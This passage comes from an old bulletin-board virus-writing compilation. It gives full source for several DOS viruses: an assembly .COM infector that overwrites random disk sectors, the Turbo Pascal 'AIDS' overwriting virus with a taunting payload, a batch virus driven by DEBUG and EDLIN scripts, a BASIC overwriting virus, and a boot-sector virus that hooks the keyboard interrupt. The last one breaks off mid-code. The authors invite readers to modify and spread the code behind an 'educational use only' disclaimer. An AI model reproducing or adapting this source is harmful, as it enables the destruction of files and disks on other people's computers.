AH,0E ;| Find # of drives + MOV DL,0 ;| + INT 21 ;| + CMP AL,01 ;| (Check if only one drive) + JNZ HUPS3 ;| (If not one drive, go the HUPS3) + MOV AL,06 ;| Set pointer to SEARCH_ORDER +6 (one drive) + + HUPS3: MOV AH,0 ;| Execute this if there is more than 1 drive + LEA BX,SEARCH_ORDER ;| + ADD BX,AX ;| + ADD BX,0001 ;| + MOV CS:POINTER,BX ;| + CLC ;| + +CHANGE_DISK: ;| Carry is set if no more .COM files are + JNC NO_NAME_CHANGE ;| found. From here, .EXE files will be + MOV AH,17 ;| renamed to .COM (change .EXE to .COM) + LEA DX,CS:MASKE_EXE ;| but will cause the error message "Program + INT 21 ;| to large to fit in memory" when starting + CMP AL,0FF ;| larger infected programs + JNZ NO_NAME_CHANGE ;| (Check if an .EXE is found) + + MOV AH,2CH ;| If neither .COM or .EXE files can be found, + INT 21 ;| then random sectors on the disk will be + MOV BX,CS:POINTER ;| overwritten depending on the system time + MOV AL,CS:[BX] ;| in milliseconds. This is the time of the + MOV BX,DX ;| complete "infection" of a storage medium. + MOV CX,2 ;| The virus can find nothing more to infect + MOV DH,0 ;| starts its destruction. + INT 26 ;| (write crap on disk) + +NO_NAME_CHANGE: ;| Check if the end of the search order table + MOV BX,CS:POINTER ;| has been reached. If so, end. + DEC BX ;| + MOV CS:POINTER,BX ;| + MOV DL,CS:[BX] ;| + CMP DL,0FF ;| + JNZ HUPS2 ;| + JMP HOPS ;| + +HUPS2: ;| Get a new drive from the search order table + MOV AH,0E ;| and select it, beginning with the ROOT dir. + INT 21 ;| (change drive) + MOV AH,3B ;| (change path) + LEA DX,PATH ;| + INT 21 ;| + JMP FIND_FIRST_FILE ;| + +FIND_FIRST_SUBDIR: ;| Starting from the root, search for the + MOV AH,17 ;| first subdir. First, (change .exe to .com) + LEA DX,CS:MASKE_EXE ;| convert all .EXE files to .COM in the + INT 21 ;| old directory. + MOV AH,3B ;| (use root directory) + LEA DX,PATH ;| + INT 21 ;| + MOV AH,04E ;| (search for first subdirectory) + MOV CX,00010001B ;| (dir mask) + LEA DX,MASKE_DIR ;| + INT 21 ;| + JC CHANGE_DISK ;| + MOV BX,CS:COUNTER ;| + INC BX ;| + DEC BX ;| + JZ USE_NEXT_SUBDIR ;| + +FIND_NEXT_SUBDIR: ;| Search for the next sub-dir, if no more + MOV AH,4FH ;| are found, the (search for next subdir) + INT 21 ;| drive will be changed. + JC CHANGE_DISK ;| + DEC BX ;| + JNZ FIND_NEXT_SUBDIR ;| + +USE_NEXT_SUBDIR: + MOV AH,2FH ;| Select found directory. (get dta address) + INT 21 ;| + ADD BX,1CH ;| + MOV ES:[BX],W"\" ;| (address of name in dta) + INC BX ;| + PUSH DS ;| + MOV AX,ES ;| + MOV DS,AX ;| + MOV DX,BX ;| + MOV AH,3B ;| (change path) + INT 21 ;| + POP DS ;| + MOV BX,CS:COUNTER ;| + INC BX ;| + MOV CS:COUNTER,BX ;| + +FIND_FIRST_FILE: ;| Find first .COM file in the current dir. + MOV AH,04E ;| If there are none, (Search for first) + MOV CX,00000001B ;| search the next directory. (mask) + LEA DX,MASKE_COM ;| + INT 21 ;| + JC FIND_FIRST_SUBDIR ;| + JMP CHECK_IF_ILL ;| + +FIND_NEXT_FILE: ;| If program is ill (infected) then search + MOV AH,4FH ;| for another. (search for next) + INT 21 ;| + JC FIND_FIRST_SUBDIR ;| + +CHECK_IF_ILL: ;| Check if already infected by virus. + MOV AH,3D ;| (open channel) + MOV AL,02 ;| (read/write) + MOV DX,9EH ;| (address of name in dta) + INT 21 ;| + MOV BX,AX ;| (save channel) + MOV AH,3FH ;| (read file) + MOV CH,BUFLEN ;| + MOV DX,BUFFER ;| (write in buffer) + INT 21 ;| + MOV AH,3EH ;| (close file) + INT 21 ;| + MOV BX,CS:[BUFFER] ;| (look for three NOP's) + CMP BX,9090 ;| + JZ FIND_NEXT_FILE ;| + + MOV AH,43 ;| This section by-passes (write enable) + MOV AL,0 ;| the MS/PC DOS Write Protection. + MOV DX,9EH ;| (address of name in dta) + INT 21 ;| + MOV AH,43 ;| + MOV AL,01 ;| + AND CX,11111110B ;| + INT 21 ;| + + MOV AH,3D ;| Open file for read/write (open channel) + MOV AL,02 ;| access (read/write) + MOV DX,9EH ;| (address of name in dta) + INT 21 ;| + + MOV BX,AX ;| Read date entry of program and (channel) + MOV AH,57 ;| save for future use. (get date) + MOV AL,0 ;| + INT 21 ;| + PUSH CX ;| (save date) + PUSH DX ;| + + MOV DX,CS:[CONTA W] ;| The jump located at 0100h (save old jmp) + MOV CS:[JMPBUF],DX ;| the program will be saved for future use. + MOV DX,CS:[BUFFER+1] ;| (save new jump) + LEA CX,CONT-100 ;| + SUB DX,CX ;| + MOV CS:[CONTA],DX ;| + + MOV AH,57 ;| The virus now copies itself to (write date) + MOV AL,1 ;| to the start of the file. + POP DX ;| + POP CX ;| (restore date) + INT 21 ;| + MOV AH,3EH ;| (close file) + INT 21 ;| + + MOV DX,CS:[JMPBUF] ;| Restore the old jump address. The virus + MOV CS:[CONTA],DX ;| at address "CONTA" the jump which was at the + ;| start of the program. This is done to +HOPS: ;| preserve the executability of the host + NOP ;| program as much as possible. After saving, + CALL USE_OLD ;| it still works with the jump address in the + ;| virus. The jump address in the virus differs + ;| from the jump address in memory + +CONT DB 0E9 ;| Continue with the host program (make jump) +CONTA DW 0 ;| + MOV AH,00 ;| + INT 21 ;| + +USE_OLD: + MOV AH,0E ;| Reactivate the selected (use old drive) + MOV DL,CS:DRIVE ;| drive at the start of the program, and + INT 21 ;| reactivate the selected path at the start + MOV AH,3B ;| of the program.(use old drive) + LEA DX,OLD_PATH-1 ;| (get old path and backslash) + INT 21 ;| + RET ;| + +SEARCH_ORDER DB 0FF,1,0,2,3,0FF,00,0FF + +POINTER DW 0000 ;| (pointer f. search order) +COUNTER DW 0000 ;| (counter f. nth. search) +DISKS DB 0 ;| (number of disks) +MASKE_COM DB "*.COM",00 ;| (search for com files) +MASKE_DIR DB "*",00 ;| (search for dir's) +MASKE_EXE DB 0FF,0,0,0,0,0,00111111XB + DB 0,"????????EXE",0,0,0,0 + DB 0,"????????COM",0 +MASKE_ALL DB 0FF,0,0,0,0,0,00111111XB + DB 0,"???????????",0,0,0,0 + DB 0,"????????COM",0 + +BUFFER EQU 0E00 ;| (a safe place) + +BUFLEN EQU 208H ;| Length of virus. Modify this accordingly + ;| if you modify this source. Be careful + ;| for this may change! + +JMPBUF EQU BUFFER+BUFLEN ;| (a safe place for jmp) + +PATH DB "\",0 ;| (first place) +DRIVE DB 0 ;| (actual drive) +BACK_SLASH DB "\" +OLD_PATH DB 32 DUP (?) ;| (old path) + +Downloaded From P-80 International Information Systems 304-744-2253 +[2.6] + +-------------------------------+ +--------------------------------------+ + | | P | | + | @@@@@@@ @@@@@@@@ @@@@@@@@ | * | ##### ##### #### ##### | + | @@ @@ @@ @@ | R | # # # # # # | + | @@ @@ @@ @@ | * | ##### # # # ##### | + | @@ @@@@@@@@ @@ | E | # # # # # # | + | @@ @@ @@ | * | # # ##### #### ##### | + | @@ @@ @@ | S | | + | @@@@@@@ @@ @@@@@@@@ | * +--------------------------------------+ + | | E | A NEW AND IMPROVED VIRUS FOR | + +-------------------------------+ * | PC/MS DOS MACHINES | + | C O R R U P T E D | N +--------------------------------------+ + | | * | CREATED BY: DOCTOR DISSECTOR | + | P R O G R A M M I N G | T |FILE INTENDED FOR EDUCATIONAL USE ONLY| + | | * | AUTHOR NOT RESPONSIBLE FOR READERS | + | I N T E R N A T I O N A L | S |DOES NOT ENDORSE ANY ILLEGAL ACTIVITYS| + +-------------------------------+ +--------------------------------------+ + + Well well, here it is... I call it AIDS... It infects all COM files, but it is + not perfect, so it will also change the date/time stamp to the current system. + Plus, any READ-ONLY attributes will ward this virus off, it doesn't like them! + + Anyway, this virus was originally named NUMBER ONE, and I modified the code so + that it would fit my needs. The source code, which is included with this neato + package was written in Turbo Pascal 3.01a. Yeah I know it's old, but it works. + + Well, I added a few things, you can experiment or mess around with it if you'd + like to, and add any mods to it that you want, but change the name and give us + some credit if you do. + + The file is approximately 13k long, and this extra memory will be added to the + file it picks as host. If no more COM files are to be found, it picks a random + value from 1-10, and if it happens to be the lucky number 7, AIDS will present + a nice screen with lots of smiles, with a note telling the operator that their + system is now screwed, I mean permanantly. The files encrypted containing AIDS + in their code are IRREVERSIBLY messed up. Oh well... + + Again, neither CPI nor the author of Number One or AIDS endorses this document + and program for use in any illegal manner. Also, CPI, the author to Number One + and AIDS is not responsible for any actions by the readers that may prove harm + in any way or another. This package was written for EDUCATIONAL purposes only! + +{ Beginning of source code, Turbo Pascal 3.01a } +{C-} +{U-} +{I-} { Wont allow a user break, enable IO check } + +{ -- Constants --------------------------------------- } + +Const + VirusSize = 13847; { AIDS's code size } + + Warning :String[42] { Warning message } + = 'This File Has Been Infected By AIDS! HaHa!'; + +{ -- Type declarations------------------------------------- } + +Type + DTARec =Record { Data area for file search } + DOSnext :Array[1..21] of Byte; + Attr : Byte; + Ftime, + FDate, + FLsize, + FHsize : Integer; + FullName: Array[1..13] of Char; + End; + +Registers = Record {Register set used for file search } + Case Byte of + 1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer); + 2 : (AL,AH,BL,BH,CL,CH,DL,DH : Byte); + End; + +{ -- Variables--------------------------------------------- } + +Var + { Memory offset program code } + ProgramStart : Byte absolute Cseg:$100; + { Infected marker } + MarkInfected : String[42] absolute Cseg:$180; + Reg : Registers; { Register set } + DTA : DTARec; { Data area } + Buffer : Array[Byte] of Byte; { Data buffer } + TestID : String[42]; { To recognize infected files } + UsePath : String[66]; { Path to search files } + { Lenght of search path } + UsePathLenght: Byte absolute UsePath; + Go : File; { File to infect } + B : Byte; { Used } + LoopVar : Integer; {Will loop forever} + +{ -- Program code------------------------------------------ } + +Begin + GetDir(0, UsePath); { get current directory } + if Pos('\', UsePath) <> UsePathLenght then + UsePath := UsePath + '\'; + UsePath := UsePath + '*.COM'; { Define search mask } + Reg.AH := $1A; { Set data area } + Reg.DS := Seg(DTA); + Reg.DX := Ofs(DTA); + MsDos(Reg); + UsePath[Succ(UsePathLenght)]:=#0; { Path must end with #0 } + Reg.AH := $4E; + Reg.DS := Seg(UsePath); + Reg.DX := Ofs(UsePath[1]); + Reg.CX := $ff; { Set attribute to find ALL files } + MsDos(Reg); { Find first matching entry } + IF not Odd(Reg.Flags) Then { If a file found then } + Repeat + UsePath := DTA.FullName; + B := Pos(#0, UsePath); + If B > 0 then + Delete(UsePath, B, 255); { Remove garbage } + Assign(Go, UsePath); + Reset(Go); + If IOresult = 0 Then { If not IO error then } + Begin + BlockRead(Go, Buffer, 2); + Move(Buffer[$80], TestID, 43); + { Test if file already ill(Infected) } + If TestID <> Warning Then { If not then ... } + Begin + Seek (Go, 0); + { Mark file as infected and .. } + MarkInfected := Warning; + { Infect it } + BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7)); + Close(Go); + Halt; {.. and halt the program } + End; + Close(Go); + End; + { The file has already been infected, search next. } + Reg.AH := $4F; + Reg.DS := Seg(DTA); + Reg.DX := Ofs(DTA); + MsDos(Reg); + { ......................Until no more files are found } + Until Odd(Reg.Flags); +Loopvar:=Random(10); +If Loopvar=7 then +begin + Writeln(' '); {Give a lot of smiles} +Writeln(''); +Writeln(' '); +Writeln('  ATTENTION: '); +Writeln('  I have been elected to inform you that throughout your process of '); +Writeln('  collecting and executing files, you have accidentally HK '); +Writeln('  yourself over; again, that''s PHUCKED yourself over. No, it cannot '); +Writeln('  be; YES, it CAN be, a s has infected your system. Now what do '); +Writeln('  you have to say about that? HAHAHAHA. Have H with this one and '); +Writeln('  remember, there is NO cure for '); +Writeln('  '); +Writeln('  '); +Writeln('  ۱ ۱ ۱ ۱ '); +Writeln('  ۱ ۱ ۱ ۱ ۱ ۱ '); +Writeln('  ۱ ۱ ۱ ۱ ۱ ۱ '); +Writeln('  ۱ ۱ ۱ ۱ '); +Writeln('  ۱۱ ۱ ۱ ۱ ۱ '); +Writeln('  ۱ ۱ ۱ ۱ ۱ ۱ '); +Writeln('  ۱ ۱ ۱ ۱ ۱ ۱ '); +Writeln('  ۱ ۱ ۱ ۱ '); +Writeln('  '); +Writeln('  '); +Writeln(' '); +REPEAT +LOOPVAR:=0; +UNTIL LOOPVAR=1; +end; +End. + +{ Although this is a primitive virus its effective. } +{ In this virus only the .COM } +{ files are infected. Its about 13K and it will } +{ change the date entry. } + +Downloaded From P-80 International Information Systems 304-744-2253 +[2.7] + + Batch Viruses + ------------- + + +Whoever thought that viruses could be in BATCH file.This virus which we + +are about to see makes use of MS-DOS operating system. This BATCH virus +uses DEBUG & EDLIN programs. + +Name: VR.BAT + +echo = off ( Self explanatory) +ctty nul ( This is important. Console output is turned off) +path c:\msdos ( May differ on other systems ) +dir *.com/w>ind ( The directory is written on "ind" ONLY name entries) + +edlin ind<1 ( "Ind" is processed with EDLIN so only file names appear) +debug ind<2 ( New batch program is created with debug) +edlin name.bat<3 ( This batch goes to an executable form because of EDLIN) +ctty con ( Console interface is again assigned) +name ( Newly created NAME.BAT is called. + + +In addition to file to this Batch file,there command files,here named 1,2,3 + +Here is the first command file: +------------------------------- +Name: 1 + +1,4d ( Here line 1-4 of the "IND" file are deleted ) +e ( Save file ) + +Here is the second command file: +-------------------------------- +Name: 2 + +m100,10b,f000 (First program name is moved to the F000H address to save) + +e108 ".BAT" (Extention of file name is changed to .BAT) +m100,10b,f010 (File is saved again) +e100"DEL " (DEL command is written to address 100H) +mf000,f00b,104 (Original file is written after this command) +e10c 2e (Period is placed in from of extension) +e110 0d,0a (Carrige return+ line feed) +mf010,f020,11f ( Modified file is moved to 11FH address from buffer area) +e112 "COPY \VR.BAT" ( COPY command is now placed in front of file) +e12b od,0a (COPY command terminated with carriage return + lf) +rxc ( The CX register is ... ) +2c ( set to 2CH) +nname.bat ( Name it NAME.BAT) +w ( Write ) +q ( quit ) + + +The third command file must be printed as a hex dump because it contains +2 control characters (1Ah=Control Z) and this is not entirely printable. + +Hex dump of the third command file: +----------------------------------- +Name: 3 + +0100 31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79 + 1 , 1 ? . . n y y y y y y y +0110 79 29 0D 32 2C 32 3F 52-20 1A OD 6E 6E 79 79 79 + y . 2 , ? ? r . . n n y y y +0120 79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00 + y y y y . E . . . . . . . . . + + +In order for this virus to work VR.BAT should be in the root. This program +only affects .COM files. + +Downloaded From P-80 International Information Systems 304-744-2253 +[2.8] + + Viruses in Basic + ---------------- + + +Basic is great language and often people think of it as a limited language +and will not be of any use in creating something like a virus. Well you are +really wrong. Lets take a look at a Basic Virus created by R. Burger in 1987. +This program is an overwritting virus and uses (Shell) MS-DOS to infect .EXE +files.To do this you must compile the source code using a the Microsoft +Quick-BASIC.Note the lenght of the compiled and the linked .EXE file and edit +the source code to place the lenght of the object program in the LENGHTVIR +variable. BV3.EXE should be in the current directory, COMMAND.COM must be +available, the LENGHTVIR variable must be set to the lenght of the linked + +program and remember to use /e parameter when compiling. + + + +10 REM ** DEMO +20 REM ** MODIFY IT YOUR OWN WAY IF DESIRED ** +30 REM ** BASIC DOESNT SUCK +40 REM ** NO KIDDING +50 ON ERROR GOTO 670 +60 REM *** LENGHTVIR MUST BE SET ** +70 REM *** TO THE LENGHT TO THE ** +80 REM *** LINKED PROGRAM *** +90 LENGHTVIR=2641 +100 VIRROOT$="BV3.EXE" +110 REM *** WRITE THE DIRECTORY IN THE FILE "INH" +130 SHELL "DIR *.EXE>INH" +140 REM ** OPEN "INH" FILE AND READ NAMES ** +150 OPEN "R",1,"INH",32000 +160 GET #1,1 +170 LINE INPUT#1,ORIGINAL$ +180 LINE INPUT#1,ORIGINAL$ +190 LINE INPUT#1,ORIGINAL$ +200 LINE INPUT#1,ORIGINAL$ +210 ON ERROR GOT 670 +220 CLOSE#2 +230 F=1:LINE INPUT#1,ORIGINAL$ +240 REM ** "%" IS THE MARKER OF THE BV3 +250 REM ** "%" IN THE NAME MEANS +260 REM ** INFECTED COPY PRESENT +270 IF MID$(ORIGINAL$,1,1)="%" THEN GOTO 210 +280 ORIGINAL$=MID$(ORIGINAL$,1,13) +290 EXTENSIONS$=MID$(ORIGINAL,9,13) +300 MID$(EXTENSIONS$,1,1)="." +310 REM *** CONCATENATE NAMES INTO FILENAMES ** +320 F=F+1 +330 IF MID$(ORIGINAL$,F,1)=" " OR MID$ (ORIGINAL$,F,1)="." OR F=13 THEN +GOTO 350 +340 GOTO 320 +350 ORIGINAL$=MID$(ORIGINAL$,1,F-1)+EXTENSION$ +360 ON ERROR GOTO 210 +365 TEST$="" +370 REM ++ OPEN FILE FOUND +++ +380 OPEN "R",2,OROGINAL$,LENGHTVIR +390 IF LOF(2) < LENGHTVIR THEN GOTO 420 +400 GET #2,2 +410 LINE INPUT#1,TEST$ +420 CLOSE#2 +431 REM ++ CHECK IF PROGRAM IS ILL ++ +440 REM ++ "%" AT THE END OF THE FILE MEANS.. +450 REM ++ FILE IS ALREADY SICK ++ +460 REM IF MID$(TEST,2,1)="%" THEN GOTO 210 +470 CLOSE#1 +480 ORIGINALS$=ORIGINAL$ +490 MID$(ORIGINALS$,1,1)="%" +499 REM ++++ SANE "HEALTHY" PROGRAM ++++ +510 C$="COPY "+ORIGINAL$+" "+ORIGINALS$ +520 SHELL C$ +530 REM *** COPY VIRUS TO HEALTHY PROGRAM **** +540 C$="COPY "+VIRROOT$+ORIGINAL$ +550 SHELL C$ +560 REM *** APPEND VIRUS MARKER *** +570 OPEN ORIGINAL$ FOR APPEND AS #1 LEN=13 +580 WRITE#1,ORIGINALS$ +590 CLOSE#1 +630 REM ++ OUYPUT MESSAGE ++ +640 PRINT "INFECTION IN " ;ORIGIANAL$; " !! BE WARE !!" +650 SYSTEM +660 REM ** VIRUS ERROR MESSAGE +670 PRINT "VIRUS INTERNAL ERROR GOTTCHA !!!!":SYSTEM +680 END + + +This basic virus will only attack .EXE files. After the execution you will +see a "INH" file which contains the directory, and the file %SORT.EXE. +Programs which start with "%" are NOT infected ,they pose as back up copies. + +Downloaded From P-80 International Information Systems 304-744-2253 +;[2.9] +;-----------------------------------------------------------------------; +; This virus is of the "FLOPPY ONLY" variety. ; +; It replicates to the boot sector of a floppy disk and when it gains control +; it will move itself to upper memory. It redirects the keyboard ; +; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ; +; it will attempt to infect any floppy it finds in drive A:. ; +; It keeps the real boot sector at track 39, sector 8, head 0 ; +; It does not map this sector bad in the fat (unlike the Pakistani Brain) +; and should that area be used by a file, the virus ; +; will die. It also contains no anti detection mechanisms as does the ; +; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ; +; sector 9 because this is common to all floppy formats both single ; +; sided and double sided. It does not contain any malevolent TROJAN ; +; HORSE code. It does appear to contain a count of how many times it ; +; has infected other diskettes although this is harmless and the count ; +; is never accessed. ; +; ; +; Things to note about this virus: ; +; It can not only live through an ALT-CTRL-DEL reboot command, but this ; +; is its primary (only for that matter) means of reproduction to other ; +; floppy diskettes. The only way to remove it from an infected system ; +; is to turn the machine off and reboot an uninfected copy of DOS. ; +; It is even resident when no floppy is booted but BASIC is loaded ; +; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ; +; it activates and infectes the floppy from which the user is ; +; attempting to boot. ; +; ; +; Also note that because of the POP CS command to pass control to ; +; its self in upper memory, this virus does not to work on 80286 ; +; machines (because this is not a valid 80286 instruction). ; +; ; +; If your assembler will not allow the POP CS command to execute, replace; +; the POP CS command with an NOP and then assemble it, then debug that ; +; part of the code and place POP CS in place of NOP at that section. ; +; ; +; The Norton Utilities can be used to identify infected diskettes by ; +; looking at the boot sector and the DOS SYS utility can be used to ; +; remove it (unlike the Pakistani Brain). ; +;-----------------------------------------------------------------------; + ; + ORG 7C00H ; + ; +TOS LABEL WORD ;TOP OF STACK +;-----------------------------------------------------------------------; +; 1. Find top of memory and copy ourself up there. (keeping same offset); +; 2. Save a copy of the first 32 interrupt vectors to top of memory too ; +; 3. Redirect int 9 (keyboard) to ourself in top of memory ; +; 4. Jump to ourself at top of memory ; +; 5. Load and execute REAL boot sector from track 40, head 0, sector 8 ; +;-----------------------------------------------------------------------; +BEGIN: CLI ;INITIALIZE STACK + XOR AX,AX ; + MOV SS,AX ; + MOV SP,offset TOS ; + STI ; + ; + MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512) + MOV DS,BX ; + MOV AX,[0013H] ; + MUL BX ; + SUB AX,07E0H ; (7C00H+512)/16 + MOV ES,AX ; + ; + PUSH CS ;DS = CS + POP DS ; + ; + CMP DI,3456H ;IF THE VIRUS IS REBOOTING... + JNE B_10 ; + DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1-- + ; +B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY + MOV DI,SI ; + MOV CX,512 ; + CLD ; + REP MOVSB ; + ; + MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO + MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE + MOV CX,128 ; + REP MOVSB ; + ; + CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) + ; + PUSH ES ;ES=HI ; JUMP TO OUR HI CODE WITH + POP CS + ; + PUSH DS ;DS=0 ; ES = DS + POP ES ; + ; + MOV BX,SP ; SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00 + MOV DX,CX ;CX=0 ;DRIVE A: HEAD 0 + MOV CX,2708H ; TRACK 40, SECTOR 8 + MOV AX,0201H ; READ SECTOR + INT 13H ; (common to 8/9 sect. 1/2 sided!) + JB $ ; HANG IF ERROR + ; + JMP JMP_BOOT ;JMP 0000:7C00 + ; +;-----------------------------------------------------------------------; +; SAVE THEN REDIRECT INT 9 VECTOR ; +; ; +; ON ENTRY: DS = 0 ; +; ES = WHERE TO SAVE OLD_09 & (HI) ; +; WHERE NEW_09 IS (HI) ; +;-----------------------------------------------------------------------; +PUT_NEW_09: ; + DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024 + ; + MOV SI,9*4 ;COPY INT 9 VECTOR TO + MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!) + MOV CX,0004 ; + ; + CLI ; + REP MOVSB ; + MOV Word Ptr [9*4],offset NEW_09 + MOV [(9*4)+2],ES ; + STI ; + ; + RET ; + ; +;-----------------------------------------------------------------------; +; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ; +;-----------------------------------------------------------------------; +ACK_KEYBD: ; + IN AL,61H ;RESET KEYBOARD THEN CONTINUE + MOV AH,AL ; + OR AL,80H ; + OUT 61H,AL ; + XCHG AL,AH ; + OUT 61H,AL ; + JMP RBOOT ; + ; +;-----------------------------------------------------------------------; +; DATA AREA WHICH IS NOT USED IN THIS VERSION ; +; REASON UNKNOWN ; +;-----------------------------------------------------------------------; +TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39 + DB 27H,0,2,2 ; (CURRENTLY NOT USED) + DB 27H,0,3,2 ; + DB 27H,0,4,2 ; + DB 27H,0,5,2 ; + DB 27H,0,6,2 ; + DB 27H,0,7,2 ; + DB 27H,0,8,2 ; + ; +;A7C9A LABEL BYTE ; + DW 00024H ;NOT USED + DB 0ADH ; + DB 07CH ; + DB 0A3H ; + DW 00026H ; + ; +;L7CA1: ; + POP CX ;NOT USED + POP DI ; + POP SI ; + POP ES ; + POP DS ; + POP AX ; + POPF ; + JMP 1111:1111 ; + ; +;-----------------------------------------------------------------------; +; IF ALT & CTRL & DEL THEN ... ; +; IF ALT & CTRL & ? THEN ... ; +;-----------------------------------------------------------------------; +NEW_09: PUSHF ; + STI ; + ; + PUSH AX ; + PUSH BX ; + PUSH DS ; + ; + PUSH CS ;DS=CS + POP DS ; + ; + MOV BX,[ALT_CTRL W] ;BX=SCAN CODE LAST TIME + IN AL,60H ;GET SCAN CODE + MOV AH,AL ;SAVE IN AH + AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH + ; + CMP AL,1DH ;IS IT A [CTRL]... + JNE N09_10 ;...JUMP IF NO + MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP) + JMP N09_30 ; + ; +N09_10: CMP AL,38H ;IS IT AN [ALT]... + JNE N09_20 ;...JUMP IF NO + MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP) + JMP N09_30 ; + ; +N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)... + JNE N09_30 ;...JUMP IF NO + ; + CMP AL,17H ;IF [I]... + JE N09_X0 ;...JUMP IF YES + CMP AL,53H ;IF [DEL]... + JE ACK_KEYBD ;...JUMP IF YES + ; +N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME + ; +N09_90: POP DS ; + POP BX ; + POP AX ; + POPF ; + ; + DB 0EAH ;JMP F000:E987 +OLD_09 DW ? ; + DW 0F000H ; + ; +N09_X0: JMP N09_X1 ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!? + MOV AX,0800H ;AL=0, AH=DELAY ARG + OUT DX,AL ; + CALL DELAY ; + MOV [ALT_CTRL],AX ;AX=0 ; + ; + MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR + INT 10H ; + MOV AH,2 ;SET CURSOR POS 0,0 + XOR DX,DX ; + MOV BH,DH ; PAGE 0 + INT 10H ; + ; + MOV AH,1 ;SET CURSOR TYPE + MOV CX,0607H ; + INT 10H ; + ; + MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW) + CALL DELAY ; + ; + CLI ; + OUT 20H,AL ;SEND EOI TO INT CONTROLLER + ; + MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS + MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!) + MOV SI,offset BEGIN - 128 ; + MOV CX,128 ; + CLD ; + REP MOVSB ; + ; + MOV DS,CX ;CX=0 ;DS=0 + ; + MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR + MOV [(19H*4)+2],CS ; + ; + MOV AX,0040H ;DS = ROM DATA AREA + MOV DS,AX ; + ; + MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0 + INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE) + ; + PUSH DS ;IF BIOS F000:E502 == 21E4... + MOV AX,0F000H ; + MOV DS,AX ; + CMP Word Ptr [0E502H],21E4H ; + POP DS ; + JE R_90 ; + INT 19H ; IF NOT...REBOOT + ; +R_90: JMP 0F000:0E502H ;...DO IT ?!?!?! + ; +;-----------------------------------------------------------------------; +; REBOOT INT VECTOR ; +;-----------------------------------------------------------------------; +NEW_19: XOR AX,AX ; + ; + MOV DS,AX ;DS=0 + MOV AX,[0410] ;AX=EQUIP FLAG + TEST AL,1 ;IF FLOPPY DRIVES ... + JNZ N19_20 ;...JUMP +N19_10: PUSH CS ;ELSE ES=CS + POP ES ; + CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) + INT 18H ;LOAD BASIC + ; +N19_20: MOV CX,0004 ;RETRY COUNT = 4 + ; +N19_22: PUSH CX ; + MOV AH,00 ;RESET DISK + INT 13 ; + JB N19_81 ; + MOV AX,0201 ;READ BOOT SECTOR + PUSH DS ; + POP ES ; + MOV BX,offset BEGIN ; + MOV CX,1 ;TRACK 0, SECTOR 1 + INT 13H ; +N19_81: POP CX ; + JNB N19_90 ; + LOOP N19_22 ; + JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC + ; +;-----------------------------------------------------------------------; +; Reinfection segment. ; +;-----------------------------------------------------------------------; +N19_90: CMP DI,3456 ;IF NOT FLAG SET... + JNZ RE_INFECT ;...RE INFECT + ; +JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR + JMP 0000:7C00H ; + ; +;-----------------------------------------------------------------------; +; Reinfection Segment. ; +;-----------------------------------------------------------------------; +RE_INFECT: ; + MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH + MOV CX,00E6H ; OURSELF + MOV DI,SI ; + PUSH CS ; + POP ES ; + CLD ; + REPE CMPSB ; + JE RI_12 ;IF NOT EQUAL... + ; + INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!) + ; +;MAKE SURE TRACK 39, HEAD 0 FORMATTED ; + MOV BX,offset TABLE ;FORMAT INFO + MOV DX,0000 ;DRIVE A: HEAD 0 + MOV CH,40-1 ;TRACK 39 + MOV AH,5 ;FORMAT + JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW ! + ; +; <<< NO EXECUTION PATH TO HERE >>> ; + JB RI_80 ; + ; +;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0 +RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0 + MOV BX,offset BEGIN ;TRACK 40H + MOV CL,8 ;SECTOR 8 + MOV AX,0301H ;WRITE 1 SECTOR + INT 13H ; + ; + PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW) + POP ES ; + JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE + ; + MOV CX,0001 ;WRITE INFECTED BOOT SECTOR ! + MOV AX,0301 ; + INT 13H ; + JB RI_80 ; IF ERROR...JUMP TO BOOT CODE + ; +RI_12: MOV DI,3456H ;SET "JUST INFECTED ANOTHER ONE"... + INT 19H ;...FLAG AND REBOOT + ; +RI_80: 